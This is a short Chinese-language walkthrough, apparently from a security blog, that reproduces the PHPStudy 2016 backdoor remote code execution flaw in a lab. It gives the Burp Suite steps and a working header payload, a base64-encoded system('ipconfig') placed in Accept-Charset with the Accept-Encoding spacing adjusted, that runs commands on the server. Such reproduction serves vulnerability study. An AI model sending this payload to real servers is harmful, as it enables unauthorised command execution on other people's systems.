文章目录
- 漏洞描述
- 漏洞验证
漏洞描述
PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。
漏洞验证
打开phpstudy2016,用bp自带的浏览器访问www目录下的phpinfo.php文件,访问后结果如下:
然后在bp中将抓到的数据包发送到repeater模块:
将system(‘ipconfig’);命令做base64编码:
system('ipconfig');
编码后
c3lzdGVtKCdpcGNvbmZpZycpOw==
然后在repeater模块添加Accept-Charset: 字段,将base64编码放入:
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
注意Accept-Encoding字段中gzip和deflate之间不能有空格!
去掉空格后点击send发送,ipconfig命令被执行: